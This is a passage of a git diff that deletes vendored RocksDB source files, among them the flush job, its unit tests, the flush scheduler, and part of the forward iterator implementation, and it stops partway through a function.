-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "[%s] [JOB %d] Level-0 flush table #%" PRIu64 ": %" PRIu64
-                   " bytes %s"
-                   "%s",
-                   cfd_->GetName().c_str(), job_context_->job_id,
-                   meta_.fd.GetNumber(), meta_.fd.GetFileSize(),
-                   s.ToString().c_str(),
-                   meta_.marked_for_compaction ? " (needs compaction)" : "");
-
-    if (output_file_directory_ != nullptr) {
-      output_file_directory_->Fsync();
-    }
-    TEST_SYNC_POINT("FlushJob::WriteLevel0Table");
-    db_mutex_->Lock();
-  }
-  base_->Unref();
-
-  // Note that if file_size is zero, the file has been deleted and
-  // should not be added to the manifest.
-  if (s.ok() && meta_.fd.GetFileSize() > 0) {
-    // if we have more than 1 background thread, then we cannot
-    // insert files directly into higher levels because some other
-    // threads could be concurrently producing compacted files for
-    // that key range.
-    // Add file to L0
-    edit_->AddFile(0 /* level */, meta_.fd.GetNumber(), meta_.fd.GetPathId(),
-                   meta_.fd.GetFileSize(), meta_.smallest, meta_.largest,
-                   meta_.smallest_seqno, meta_.largest_seqno,
-                   meta_.marked_for_compaction);
-  }
-
-  // Note that here we treat flush as level 0 compaction in internal stats
-  InternalStats::CompactionStats stats(1);
-  stats.micros = db_options_.env->NowMicros() - start_micros;
-  stats.bytes_written = meta_.fd.GetFileSize();
-  cfd_->internal_stats()->AddCompactionStats(0 /* level */, stats);
-  cfd_->internal_stats()->AddCFStats(InternalStats::BYTES_FLUSHED,
-                                     meta_.fd.GetFileSize());
-  RecordFlushIOStats();
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_job.h b/thirdparty/rocksdb/db/flush_job.h
deleted file mode 100644
index 4698ae7..0000000
--- a/thirdparty/rocksdb/db/flush_job.h
+++ /dev/null
@@ -1,110 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-
-#include "db/column_family.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/snapshot_impl.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/transaction_log.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-
-class FlushJob {
- public:
-  // TODO(icanadi) make effort to reduce number of parameters here
-  // IMPORTANT: mutable_cf_options needs to be alive while FlushJob is alive
-  FlushJob(const std::string& dbname, ColumnFamilyData* cfd,
-           const ImmutableDBOptions& db_options,
-           const MutableCFOptions& mutable_cf_options,
-           const EnvOptions& env_options, VersionSet* versions,
-           InstrumentedMutex* db_mutex, std::atomic<bool>* shutting_down,
-           std::vector<SequenceNumber> existing_snapshots,
-           SequenceNumber earliest_write_conflict_snapshot,
-           JobContext* job_context, LogBuffer* log_buffer,
-           Directory* db_directory, Directory* output_file_directory,
-           CompressionType output_compression, Statistics* stats,
-           EventLogger* event_logger, bool measure_io_stats);
-
-  ~FlushJob();
-
-  // Require db_mutex held.
-  // Once PickMemTable() is called, either Run() or Cancel() has to be called.
-  void PickMemTable();
-  Status Run(FileMetaData* file_meta = nullptr);
-  void Cancel();
-  TableProperties GetTableProperties() const { return table_properties_; }
-
- private:
-  void ReportStartedFlush();
-  void ReportFlushInputSize(const autovector<MemTable*>& mems);
-  void RecordFlushIOStats();
-  Status WriteLevel0Table();
-  const std::string& dbname_;
-  ColumnFamilyData* cfd_;
-  const ImmutableDBOptions& db_options_;
-  const MutableCFOptions& mutable_cf_options_;
-  const EnvOptions& env_options_;
-  VersionSet* versions_;
-  InstrumentedMutex* db_mutex_;
-  std::atomic<bool>* shutting_down_;
-  std::vector<SequenceNumber> existing_snapshots_;
-  SequenceNumber earliest_write_conflict_snapshot_;
-  JobContext* job_context_;
-  LogBuffer* log_buffer_;
-  Directory* db_directory_;
-  Directory* output_file_directory_;
-  CompressionType output_compression_;
-  Statistics* stats_;
-  EventLogger* event_logger_;
-  TableProperties table_properties_;
-  bool measure_io_stats_;
-
-  // Variables below are set by PickMemTable():
-  FileMetaData meta_;
-  autovector<MemTable*> mems_;
-  VersionEdit* edit_;
-  Version* base_;
-  bool pick_memtable_called;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_job_test.cc b/thirdparty/rocksdb/db/flush_job_test.cc
deleted file mode 100644
index 34a3c98..0000000
--- a/thirdparty/rocksdb/db/flush_job_test.cc
+++ /dev/null
@@ -1,223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-#include <map>
-#include <string>
-
-#include "db/column_family.h"
-#include "db/flush_job.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// TODO(icanadi) Mock out everything else:
-// 1. VersionSet
-// 2. Memtable
-class FlushJobTest : public testing::Test {
- public:
-  FlushJobTest()
-      : env_(Env::Default()),
-        dbname_(test::TmpDir() + "/flush_job_test"),
-        options_(),
-        db_options_(options_),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        versions_(new VersionSet(dbname_, &db_options_, env_options_,
-                                 table_cache_.get(), &write_buffer_manager_,
-                                 &write_controller_)),
-        shutting_down_(false),
-        mock_table_factory_(new mock::MockTableFactory()) {
-    EXPECT_OK(env_->CreateDirIfMissing(dbname_));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-    // TODO(icanadi) Remove this once we mock out VersionSet
-    NewDB();
-    std::vector<ColumnFamilyDescriptor> column_families;
-    cf_options_.table_factory = mock_table_factory_;
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options_);
-
-    EXPECT_OK(versions_->Recover(column_families, false));
-  }
-
-  void NewDB() {
-    VersionEdit new_db;
-    new_db.SetLogNumber(0);
-    new_db.SetNextFile(2);
-    new_db.SetLastSequence(0);
-
-    const std::string manifest = DescriptorFileName(dbname_, 1);
-    unique_ptr<WritableFile> file;
-    Status s = env_->NewWritableFile(
-        manifest, &file, env_->OptimizeForManifestWrite(env_options_));
-    ASSERT_OK(s);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), EnvOptions()));
-    {
-      log::Writer log(std::move(file_writer), 0, false);
-      std::string record;
-      new_db.EncodeTo(&record);
-      s = log.AddRecord(record);
-    }
-    ASSERT_OK(s);
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, nullptr);
-  }
-
-  Env* env_;
-  std::string dbname_;
-  EnvOptions env_options_;
-  Options options_;
-  ImmutableDBOptions db_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteController write_controller_;
-  WriteBufferManager write_buffer_manager_;
-  ColumnFamilyOptions cf_options_;
-  std::unique_ptr<VersionSet> versions_;
-  InstrumentedMutex mutex_;
-  std::atomic<bool> shutting_down_;
-  std::shared_ptr<mock::MockTableFactory> mock_table_factory_;
-};
-
-TEST_F(FlushJobTest, Empty) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(dbname_, versions_->GetColumnFamilySet()->GetDefault(),
-                     db_options_, *cfd->GetLatestMutableCFOptions(),
-                     env_options_, versions_.get(), &mutex_, &shutting_down_,
-                     {}, kMaxSequenceNumber, &job_context, nullptr, nullptr,
-                     nullptr, kNoCompression, nullptr, &event_logger, false);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    flush_job.PickMemTable();
-    ASSERT_OK(flush_job.Run());
-  }
-  job_context.Clean();
-}
-
-TEST_F(FlushJobTest, NonEmpty) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto new_mem = cfd->ConstructNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                           kMaxSequenceNumber);
-  new_mem->Ref();
-  auto inserted_keys = mock::MakeMockFile();
-  // Test data:
-  //   seqno [    1,    2 ... 8998, 8999, 9000, 9001, 9002 ... 9999 ]
-  //   key   [ 1001, 1002 ... 9998, 9999,    0,    1,    2 ...  999 ]
-  //   range-delete "9995" -> "9999" at seqno 10000
-  for (int i = 1; i < 10000; ++i) {
-    std::string key(ToString((i + 1000) % 10000));
-    std::string value("value" + key);
-    new_mem->Add(SequenceNumber(i), kTypeValue, key, value);
-    if ((i + 1000) % 10000 < 9995) {
-      InternalKey internal_key(key, SequenceNumber(i), kTypeValue);
-      inserted_keys.insert({internal_key.Encode().ToString(), value});
-    }
-  }
-  new_mem->Add(SequenceNumber(10000), kTypeRangeDeletion, "9995", "9999a");
-  InternalKey internal_key("9995", SequenceNumber(10000), kTypeRangeDeletion);
-  inserted_keys.insert({internal_key.Encode().ToString(), "9999a"});
-
-  autovector<MemTable*> to_delete;
-  cfd->imm()->Add(new_mem, &to_delete);
-  for (auto& m : to_delete) {
-    delete m;
-  }
-
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(dbname_, versions_->GetColumnFamilySet()->GetDefault(),
-                     db_options_, *cfd->GetLatestMutableCFOptions(),
-                     env_options_, versions_.get(), &mutex_, &shutting_down_,
-                     {}, kMaxSequenceNumber, &job_context, nullptr, nullptr,
-                     nullptr, kNoCompression, nullptr, &event_logger, true);
-  FileMetaData fd;
-  mutex_.Lock();
-  flush_job.PickMemTable();
-  ASSERT_OK(flush_job.Run(&fd));
-  mutex_.Unlock();
-  ASSERT_EQ(ToString(0), fd.smallest.user_key().ToString());
-  ASSERT_EQ("9999a",
-            fd.largest.user_key().ToString());  // range tombstone end key
-  ASSERT_EQ(1, fd.smallest_seqno);
-  ASSERT_EQ(10000, fd.largest_seqno);  // range tombstone seqnum 10000
-  mock_table_factory_->AssertSingleFile(inserted_keys);
-  job_context.Clean();
-}
-
-TEST_F(FlushJobTest, Snapshots) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto new_mem = cfd->ConstructNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                           kMaxSequenceNumber);
-
-  std::vector<SequenceNumber> snapshots;
-  std::set<SequenceNumber> snapshots_set;
-  int keys = 10000;
-  int max_inserts_per_keys = 8;
-
-  Random rnd(301);
-  for (int i = 0; i < keys / 2; ++i) {
-    snapshots.push_back(rnd.Uniform(keys * (max_inserts_per_keys / 2)) + 1);
-    snapshots_set.insert(snapshots.back());
-  }
-  std::sort(snapshots.begin(), snapshots.end());
-
-  new_mem->Ref();
-  SequenceNumber current_seqno = 0;
-  auto inserted_keys = mock::MakeMockFile();
-  for (int i = 1; i < keys; ++i) {
-    std::string key(ToString(i));
-    int insertions = rnd.Uniform(max_inserts_per_keys);
-    for (int j = 0; j < insertions; ++j) {
-      std::string value(test::RandomHumanReadableString(&rnd, 10));
-      auto seqno = ++current_seqno;
-      new_mem->Add(SequenceNumber(seqno), kTypeValue, key, value);
-      // a key is visible only if:
-      // 1. it's the last one written (j == insertions - 1)
-      // 2. there's a snapshot pointing at it
-      bool visible = (j == insertions - 1) ||
-                     (snapshots_set.find(seqno) != snapshots_set.end());
-      if (visible) {
-        InternalKey internal_key(key, seqno, kTypeValue);
-        inserted_keys.insert({internal_key.Encode().ToString(), value});
-      }
-    }
-  }
-
-  autovector<MemTable*> to_delete;
-  cfd->imm()->Add(new_mem, &to_delete);
-  for (auto& m : to_delete) {
-    delete m;
-  }
-
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(
-      dbname_, versions_->GetColumnFamilySet()->GetDefault(), db_options_,
-      *cfd->GetLatestMutableCFOptions(), env_options_, versions_.get(), &mutex_,
-      &shutting_down_, snapshots, kMaxSequenceNumber, &job_context, nullptr,
-      nullptr, nullptr, kNoCompression, nullptr, &event_logger, true);
-  mutex_.Lock();
-  flush_job.PickMemTable();
-  ASSERT_OK(flush_job.Run());
-  mutex_.Unlock();
-  mock_table_factory_->AssertSingleFile(inserted_keys);
-  job_context.Clean();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/flush_scheduler.cc b/thirdparty/rocksdb/db/flush_scheduler.cc
deleted file mode 100644
index 8735a6b..0000000
--- a/thirdparty/rocksdb/db/flush_scheduler.cc
+++ /dev/null
@@ -1,88 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/flush_scheduler.h"
-
-#include <cassert>
-
-#include "db/column_family.h"
-
-namespace rocksdb {
-
-void FlushScheduler::ScheduleFlush(ColumnFamilyData* cfd) {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-  assert(checking_set_.count(cfd) == 0);
-  checking_set_.insert(cfd);
-#endif  // NDEBUG
-  cfd->Ref();
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-  Node* node = new Node{cfd, head_.load(std::memory_order_relaxed)};
-  while (!head_.compare_exchange_strong(
-      node->next, node, std::memory_order_relaxed, std::memory_order_relaxed)) {
-    // failing CAS updates the first param, so we are already set for
-    // retry.  TakeNextColumnFamily won't happen until after another
-    // inter-thread synchronization, so we don't even need release
-    // semantics for this CAS
-  }
-#endif  // __clang_analyzer__
-}
-
-ColumnFamilyData* FlushScheduler::TakeNextColumnFamily() {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-#endif  // NDEBUG
-  while (true) {
-    if (head_.load(std::memory_order_relaxed) == nullptr) {
-      return nullptr;
-    }
-
-    // dequeue the head
-    Node* node = head_.load(std::memory_order_relaxed);
-    head_.store(node->next, std::memory_order_relaxed);
-    ColumnFamilyData* cfd = node->column_family;
-    delete node;
-
-#ifndef NDEBUG
-    auto iter = checking_set_.find(cfd);
-    assert(iter != checking_set_.end());
-    checking_set_.erase(iter);
-#endif  // NDEBUG
-
-    if (!cfd->IsDropped()) {
-      // success
-      return cfd;
-    }
-
-    // no longer relevant, retry
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-}
-
-bool FlushScheduler::Empty() {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-#endif  // NDEBUG
-  auto rv = head_.load(std::memory_order_relaxed) == nullptr;
-#ifndef NDEBUG
-  assert(rv == checking_set_.empty());
-#endif  // NDEBUG
-  return rv;
-}
-
-void FlushScheduler::Clear() {
-  ColumnFamilyData* cfd;
-  while ((cfd = TakeNextColumnFamily()) != nullptr) {
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  assert(head_.load(std::memory_order_relaxed) == nullptr);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_scheduler.h b/thirdparty/rocksdb/db/flush_scheduler.h
deleted file mode 100644
index cd35758..0000000
--- a/thirdparty/rocksdb/db/flush_scheduler.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-#include <atomic>
-#include <mutex>
-#include <set>
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-
-// Unless otherwise noted, all methods on FlushScheduler should be called
-// only with the DB mutex held or from a single-threaded recovery context.
-class FlushScheduler {
- public:
-  FlushScheduler() : head_(nullptr) {}
-
-  // May be called from multiple threads at once, but not concurrent with
-  // any other method calls on this instance
-  void ScheduleFlush(ColumnFamilyData* cfd);
-
-  // Removes and returns Ref()-ed column family. Client needs to Unref().
-  // Filters column families that have been dropped.
-  ColumnFamilyData* TakeNextColumnFamily();
-
-  bool Empty();
-
-  void Clear();
-
- private:
-  struct Node {
-    ColumnFamilyData* column_family;
-    Node* next;
-  };
-
-  std::atomic<Node*> head_;
-#ifndef NDEBUG
-  std::mutex checking_mutex_;
-  std::set<ColumnFamilyData*> checking_set_;
-#endif  // NDEBUG
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/forward_iterator.cc b/thirdparty/rocksdb/db/forward_iterator.cc
deleted file mode 100644
index 65fff95..0000000
--- a/thirdparty/rocksdb/db/forward_iterator.cc
+++ /dev/null
@@ -1,905 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "db/forward_iterator.h"
-
-#include <limits>
-#include <string>
-#include <utility>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/merging_iterator.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Usage:
-//     LevelIterator iter;
-//     iter.SetFileIndex(file_index);
-//     iter.Seek(target);
-//     iter.Next()
-class LevelIterator : public InternalIterator {
- public:
-  LevelIterator(const ColumnFamilyData* const cfd,
-                const ReadOptions& read_options,
-                const std::vector<FileMetaData*>& files)
-      : cfd_(cfd),
-        read_options_(read_options),
-        files_(files),
-        valid_(false),
-        file_index_(std::numeric_limits<uint32_t>::max()),
-        file_iter_(nullptr),
-        pinned_iters_mgr_(nullptr) {}
-
-  ~LevelIterator() {
-    // Reset current pointer
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinIterator(file_iter_);
-    } else {
-      delete file_iter_;
-    }
-  }
-
-  void SetFileIndex(uint32_t file_index) {
-    assert(file_index < files_.size());
-    if (file_index != file_index_) {
-      file_index_ = file_index;
-      Reset();
-    }
-    valid_ = false;
-  }
-  void Reset() {
-    assert(file_index_ < files_.size());
-
-    // Reset current pointer
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinIterator(file_iter_);
-    } else {
-      delete file_iter_;
-    }
-
-    RangeDelAggregator range_del_agg(
-        cfd_->internal_comparator(), {} /* snapshots */);
-    file_iter_ = cfd_->table_cache()->NewIterator(
-        read_options_, *(cfd_->soptions()), cfd_->internal_comparator(),
-        files_[file_index_]->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg,
-        nullptr /* table_reader_ptr */, nullptr, false);
-    file_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-    if (!range_del_agg.IsEmpty()) {
-      status_ = Status::NotSupported(
-          "Range tombstones unsupported with ForwardIterator");
-      valid_ = false;
-    }
-  }
-  void SeekToLast() override {
-    status_ = Status::NotSupported("LevelIterator::SeekToLast()");
-    valid_ = false;
-  }
-  void Prev() override {
-    status_ = Status::NotSupported("LevelIterator::Prev()");
-    valid_ = false;
-  }
-  bool Valid() const override {
-    return valid_;
-  }
-  void SeekToFirst() override {
-    SetFileIndex(0);
-    file_iter_->SeekToFirst();
-    valid_ = file_iter_->Valid();
-  }
-  void Seek(const Slice& internal_key) override {
-    assert(file_iter_ != nullptr);
-    file_iter_->Seek(internal_key);
-    valid_ = file_iter_->Valid();
-  }
-  void SeekForPrev(const Slice& internal_key) override {
-    status_ = Status::NotSupported("LevelIterator::SeekForPrev()");
-    valid_ = false;
-  }
-  void Next() override {
-    assert(valid_);
-    file_iter_->Next();
-    for (;;) {
-      if (file_iter_->status().IsIncomplete() || file_iter_->Valid()) {
-        valid_ = !file_iter_->status().IsIncomplete();
-        return;
-      }
-      if (file_index_ + 1 >= files_.size()) {
-        valid_ = false;
-        return;
-      }
-      SetFileIndex(file_index_ + 1);
-      file_iter_->SeekToFirst();
-    }
-  }
-  Slice key() const override {
-    assert(valid_);
-    return file_iter_->key();
-  }
-  Slice value() const override {
-    assert(valid_);
-    return file_iter_->value();
-  }
-  Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    } else if (file_iter_ && !file_iter_->status().ok()) {
-      return file_iter_->status();
-    }
-    return Status::OK();
-  }
-  bool IsKeyPinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           file_iter_->IsKeyPinned();
-  }
-  bool IsValuePinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           file_iter_->IsValuePinned();
-  }
-  void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    if (file_iter_) {
-      file_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
- private:
-  const ColumnFamilyData* const cfd_;
-  const ReadOptions& read_options_;
-  const std::vector<FileMetaData*>& files_;
-
-  bool valid_;
-  uint32_t file_index_;
-  Status status_;
-  InternalIterator* file_iter_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-};
-
-ForwardIterator::ForwardIterator(DBImpl* db, const ReadOptions& read_options,
-                                 ColumnFamilyData* cfd,
-                                 SuperVersion* current_sv)
-    : db_(db),
-      read_options_(read_options),
-      cfd_(cfd),
-      prefix_extractor_(cfd->ioptions()->prefix_extractor),
-      user_comparator_(cfd->user_comparator()),
-      immutable_min_heap_(MinIterComparator(&cfd_->internal_comparator())),
-      sv_(current_sv),
-      mutable_iter_(nullptr),
-      current_(nullptr),
-      valid_(false),
-      status_(Status::OK()),
-      immutable_status_(Status::OK()),
-      has_iter_trimmed_for_upper_bound_(false),
-      current_over_upper_bound_(false),
-      is_prev_set_(false),
-      is_prev_inclusive_(false),
-      pinned_iters_mgr_(nullptr) {
-  if (sv_) {
-    RebuildIterators(false);
-  }
-}
-
-ForwardIterator::~ForwardIterator() {
-  Cleanup(true);
-}
-
-namespace {
-// Used in PinnedIteratorsManager to release pinned SuperVersion
-static void ReleaseSuperVersionFunc(void* sv) {
-  delete reinterpret_cast<SuperVersion*>(sv);
-}
-}  // namespace
-
-void ForwardIterator::SVCleanup() {
-  if (sv_ != nullptr && sv_->Unref()) {
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-    db_->mutex_.Lock();
-    sv_->Cleanup();
-    db_->FindObsoleteFiles(&job_context, false, true);
-    if (read_options_.background_purge_on_iterator_cleanup) {
-      db_->ScheduleBgLogWriterClose(&job_context);
-    }
-    db_->mutex_.Unlock();
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinPtr(sv_, &ReleaseSuperVersionFunc);
-    } else {
-      delete sv_;
-    }
-    if (job_context.HaveSomethingToDelete()) {
-      db_->PurgeObsoleteFiles(
-          job_context, read_options_.background_purge_on_iterator_cleanup);
-    }
-    job_context.Clean();
-  }
-}
-
-void ForwardIterator::Cleanup(bool release_sv) {
-  if (mutable_iter_ != nullptr) {
-    DeleteIterator(mutable_iter_, true /* is_arena */);
-  }
-
-  for (auto* m : imm_iters_) {
-    DeleteIterator(m, true /* is_arena */);
-  }
-  imm_iters_.clear();
-
-  for (auto* f : l0_iters_) {
-    DeleteIterator(f);
-  }
-  l0_iters_.clear();
-
-  for (auto* l : level_iters_) {
-    DeleteIterator(l);
-  }
-  level_iters_.clear();
-
-  if (release_sv) {
-    SVCleanup();
-  }
-}
-
-bool ForwardIterator::Valid() const {
-  // See UpdateCurrent().
-  return valid_ ? !current_over_upper_bound_ : false;
-}
-
-void ForwardIterator::SeekToFirst() {
-  if (sv_ == nullptr) {
-    RebuildIterators(true);
-  } else if (sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    RenewIterators();
-  } else if (immutable_status_.IsIncomplete()) {
-    ResetIncompleteIterators();
-  }
-  SeekInternal(Slice(), true);
-}
-
-bool ForwardIterator::IsOverUpperBound(const Slice& internal_key) const {
-  return !(read_options_.iterate_upper_bound == nullptr ||
-           cfd_->internal_comparator().user_comparator()->Compare(
-               ExtractUserKey(internal_key),
-               *read_options_.iterate_upper_bound) < 0);
-}
-
-void ForwardIterator::Seek(const Slice& internal_key) {
-  if (IsOverUpperBound(internal_key)) {
-    valid_ = false;
-  }
-  if (sv_ == nullptr) {
-    RebuildIterators(true);
-  } else if (sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    RenewIterators();
-  } else if (immutable_status_.IsIncomplete()) {
-    ResetIncompleteIterators();
-  }
-  SeekInternal(internal_key, false);
-}
-
-void ForwardIterator::SeekInternal(const Slice& internal_key,
-                                   bool seek_to_first) {
-  assert(mutable_iter_);
-  // mutable
-  seek_to_first ? mutable_iter_->SeekToFirst() :
-                  mutable_iter_->Seek(internal_key);
-
-  // immutable
-  // TODO(ljin): NeedToSeekImmutable has negative impact on performance
-  // if it turns to need to seek immutable often. We probably want to have
-  // an option to turn it off.
-  if (seek_to_first || NeedToSeekImmutable(internal_key)) {
-    immutable_status_ = Status::OK();
-    if (has_iter_trimmed_for_upper_bound_ &&
-        (
-            // prev_ is not set yet
-            is_prev_set_ == false ||
-            // We are doing SeekToFirst() and internal_key.size() = 0
-            seek_to_first ||
-            // prev_key_ > internal_key
-            cfd_->internal_comparator().InternalKeyComparator::Compare(
-                prev_key_.GetInternalKey(), internal_key) > 0)) {
-      // Some iterators are trimmed. Need to rebuild.
-      RebuildIterators(true);
-      // Already seeked mutable iter, so seek again
-      seek_to_first ? mutable_iter_->SeekToFirst()
-                    : mutable_iter_->Seek(internal_key);
-    }
-    {
-      auto tmp = MinIterHeap(MinIterComparator(&cfd_->internal_comparator()));
-      immutable_min_heap_.swap(tmp);
-    }
-    for (size_t i = 0; i < imm_iters_.size(); i++) {
-      auto* m = imm_iters_[i];
-      seek_to_first ? m->SeekToFirst() : m->Seek(internal_key);
-      if (!m->status().ok()) {
-        immutable_status_ = m->status();
-      } else if (m->Valid()) {
-        immutable_min_heap_.push(m);
-      }
-    }
-
-    Slice user_key;
-    if (!seek_to_first) {
-      user_key = ExtractUserKey(internal_key);
-    }
-    const VersionStorageInfo* vstorage = sv_->current->storage_info();
-    const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-    for (size_t i = 0; i < l0.size(); ++i) {
-      if (!l0_iters_[i]) {
-        continue;
-      }
-      if (seek_to_first) {
-        l0_iters_[i]->SeekToFirst();
-      } else {
-        // If the target key passes over the larget key, we are sure Next()
-        // won't go over this file.
-        if (user_comparator_->Compare(user_key,
-              l0[i]->largest.user_key()) > 0) {
-          if (read_options_.iterate_upper_bound != nullptr) {
-            has_iter_trimmed_for_upper_bound_ = true;
-            DeleteIterator(l0_iters_[i]);
-            l0_iters_[i] = nullptr;
-          }
-          continue;
-        }
-        l0_iters_[i]->Seek(internal_key);
-      }
-
-      if (!l0_iters_[i]->status().ok()) {
-        immutable_status_ = l0_iters_[i]->status();
-      } else if (l0_iters_[i]->Valid()) {
-        if (!IsOverUpperBound(l0_iters_[i]->key())) {
-          immutable_min_heap_.push(l0_iters_[i]);
-        } else {
-          has_iter_trimmed_for_upper_bound_ = true;
-          DeleteIterator(l0_iters_[i]);
-          l0_iters_[i] = nullptr;
-        }
-      }
-    }
-
-    for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-      const std::vector<FileMetaData*>& level_files =
-          vstorage->LevelFiles(level);
-      if (level_files.empty()) {
-        continue;
-      }
-      if (level_iters_[level - 1] == nullptr) {
-        continue;
-      }
-      uint32_t f_idx = 0;
-      if (!seek_to_first) {
-        f_idx = FindFileInRange(level_files, internal_key, 0,
-                                static_cast<uint32_t>(level_files.size()));
-      }
-
-      // Seek
-      if (f_idx < level_files.size()) {
-        level_iters_[level - 1]->SetFileIndex(f_idx);
-        seek_to_first ? level_iters_[level - 1]->SeekToFirst() :
-                        level_iters_[level - 1]->Seek(internal_key);
-
-        if (!level_iters_[level - 1]->status().ok()) {
-          immutable_status_ = level_iters_[level - 1]->status();
-        } else if (level_iters_[level - 1]->Valid()) {
-          if (!IsOverUpperBound(level_iters_[level - 1]->key())) {
-            immutable_min_heap_.push(level_iters_[level - 1]);
-          } else {
-            // Nothing in this level is interesting. Remove.
-            has_iter_trimmed_for_upper_bound_ = true;
-            DeleteIterator(level_iters_[level - 1]);
-            level_iters_[level - 1] = nullptr;
-          }
-        }
-      }
-    }
-
-    if (seek_to_first) {
